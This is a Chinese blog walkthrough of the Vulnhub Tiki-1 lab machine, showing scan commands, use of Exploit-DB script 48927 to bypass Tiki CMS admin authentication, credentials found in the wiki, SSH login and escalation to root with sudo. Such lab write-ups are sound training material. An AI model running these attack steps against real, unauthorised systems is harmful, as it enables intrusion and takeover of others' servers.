Vulnhub: Tiki-1靶机

ctostm

已于 2023-06-07 23:25:00 修改

阅读量169

点赞数

文章标签：安全 web安全网络安全

于 2023-05-18 09:35:25 首次发布

本文链接：https://blog.csdn.net/qq_43884092/article/details/130739958

版权

kali：192.168.111.111

靶机：192.168.111.133

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.133

从目标网站的robots.txt文件中，发现存在目录/tiki/

访问目录发现为tiki cms

该cms存在身份验证绕过

searchsploit tiki

漏洞利用

使用exp清空admin用户密码

searchsploit -p 48927
cp /usr/share/exploitdb/exploits/php/webapps/48927.py .
python3 48927.py 192.168.111.133

登录时使用burp抓包，清空pass参数的值之后发包，即可登录

在Wiki --> List Pages --> Credentials发现账号密码：silky | Agy8Y7SPJNXQzqA

提权

使用该账号密码登录目标ssh

ssh silky@192.168.111.133

查看sudo权限

提升为root

sudo su

flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ctostm

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Vulnhub: Tiki-1靶机

tiki cms身份验证绕过，sudo提权
复制链接

扫一扫

VulnHub靶场-Tiki

hxync的博客

08-08

924

靶场下载地址：tiki. 下载之后导入virtualbox启动不能直接看到IP地址先看一下kali的ip： Nmap扫一下192.168.1.0/24网段的主机，找到了靶机的IP地址再扫一下靶机开放的端口：开放了22 80 139 445 这四个端口浏览器访问80端口没有发现什么有用的东西 Dirbuster扫一下目录浏览器访问一下扫到的robots.txt 发现robots.txt文件里也有扫到的tiki目录，访问一下发现提示是tikiwikicms 再加上下载靶场时有提示是cve漏洞

vulnhub靶机实战-My-cmsms靶机

09-29

vulnhub靶机实战-My-cmsms靶机本文档将针对vulnhub靶机实战-My-cmsms靶机，详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。主机发现在靶机实战中，主机发现是指通过各种技术手段来发现目标网络中...

参与评论您还未登录，请先登录后发表或查看评论

Tiki靶机(CMS漏洞)

m0_66299232的博客

11-11

856

5.直接运行后发现，可以结合bp使用admin用户免密登录。2.sudo -l 发现可以执行任意命令，成功拿下！3.searchsploit tiki 查到可利用脚本。攻击机系统：kali linux 2021.1。4.下载下来后，查看是用pytho3写的脚本。6.抓包后把密码删掉，放包即可成功登录。2.根据提示访问后，发现是一个cms。1.用已知的账号密码进行22端口登录。7.随便点点后，发现一组用户名密码。1.探测目标靶机开放端口和服务。虚拟机网络链接模式：桥接模式。2.用gobuster扫目录。

Tiki靶机 (为CMS漏洞)

m0_60045654的博客

11-14

要提前设置好靶机和攻击机(kali)的网卡模式，NAT模式和桥接模式都可以，如果不设置的话，光是扫描靶机IP就会浪费好多好多的时间，而且靶机IP也不一定会有，所以尽量让靶机处于与攻击机同一种网络模式下，我的是处于NAT 模式因为靶机和kali是在同一网络模式下，所以先查看一下kali的IP，一边好找靶机IP1. arp-scan -l 可以快速的扫描ip靶机IP为：10.4.7.1452. 端口扫描。

靶机6 Tiki

wj33333的博客

10-20

arp-scan -l 扫描，查找靶机IPnmap 扫描，查找靶机端口dirsearch 扫描目录查看/robots.txt发现/tiki/目录访问。

记一次面向WP的TIKI靶机渗透

Fear1e4的博客

02-09

708

寒假闲着无聊就像找个靶机先打起来。刚入门，所以就先面向wp，熟悉一下渗透测试的整个流程。这里都是用root终端打的靶，但是看过红队笔记的渗透，说是不要用root终端，还是要养成打sudo的习惯，说是在正式的红蓝攻防里会吃亏，咱们没打过，也不知道吃亏在哪，有机会去问问大佬。

Vulnhub靶机渗透测试 DC-8靶机

12-07

Vulnhub靶机渗透测试 DC-8靶机

Vulnhub靶机渗透测试 Five-1靶机

12-07

Vulnhub靶机渗透测试 Five-1靶机

Vulnhub靶机系列：De-ICE: S1.120

01-09

靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它，我的这篇文章有简单指导Vulnhub靶机系列：pWnOS: 2.0另外iso文件如何导入就不赘述了，安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。利用...

Vulnhub靶机渗透测试 DC-1靶机

03-05

Vulnhub靶机渗透测试 DC-1靶机

靶机渗透练习11-Tiki

hirak0的博客

04-15

2258

靶机描述靶机地址：https://www.vulnhub.com/entry/tiki-1,525/ Description Oh no our webserver got compromised. The attacker used an 0day, so we dont know how he got into the admin panel. Investigate that. This is an OSCP Prep Box, its based on a CVE I recently foun

vulnhub-Tiki - 类oscp靶机攻略1

yutianovo的博客

07-14

1238

本文为类oscp靶机打靶1

渗透测试靶机实战---系统篇05

一杯咖啡的渗透记忆

10-15

733

（续）渗透测试靶机实战---系统篇04 12.vsftpd Compromised Source Packages Backdoor Vulnerability msf5 > search vsftpd Matching Modules ================ # Name Disclos...

捷配总结的SMT工厂安全防静电规则

tyymm的博客

07-17

603

SMT工厂须熟记的安全防静电规则！安全对于我们非常重要，特别是我们这种SMT加工厂，通常我们所讲的安全是指人身安全。但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。电气：怎样预防人身触电事故？ 1、发现有损坏的开关，电线等电气安全隐患，赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时，不要用湿抹布擦电线、开关按钮，一定要搞卫生，请先断开电

粉尘传感器助力面粉厂安全生产

iotsensor的博客

07-19

294

OPC-R2有16个大小的垃圾箱，可以每秒记录PM1、PM2.5和PM10以及大小直方图，这在应用程序需要的不仅仅是PM时至关重要。OPC-R2取代了OPC-R1，带来了比其前身更好的小颗粒检测、更低的风扇噪声和更好的EMC保护。因此，如何有效监测和控制面粉厂的粉尘浓度，成为了保障安全生产的关键。这种传感器能够实时、准确地监测空气中的粉尘浓度，并将数据反馈给控制系统，从而实现对粉尘浓度的有效控制。通过实时监测和控制粉尘浓度，可以有效保障工作人员的健康、设备的安全运行以及环境的保护。

权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例

haiyunan的博客

07-16

529

在“某省烟草数据安全体系建设规划”项目实践中，海云安基于双生命周期融合与零信任架构的总体思路，立足业务基于场景，通过建设技术、管理、运营三大体系，为公司构建了覆盖数据生命周期、应用生命周期的“数盾”，解决数据安全合规、风险管控、业务影响控制等问题，从而为公司打造一个安全可靠的数据使用环境，助力公司持续稳健发展。通过实施数据安全零信任架构，企业将显著提高数据安全性，减少数据泄露和网络攻击的风险，增强对复杂安全环境的应对能力，实现持续的安全保护和合规运营。

ForCloud全栈安全体验,一站式云安全托管试用开启全能高效攻防

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交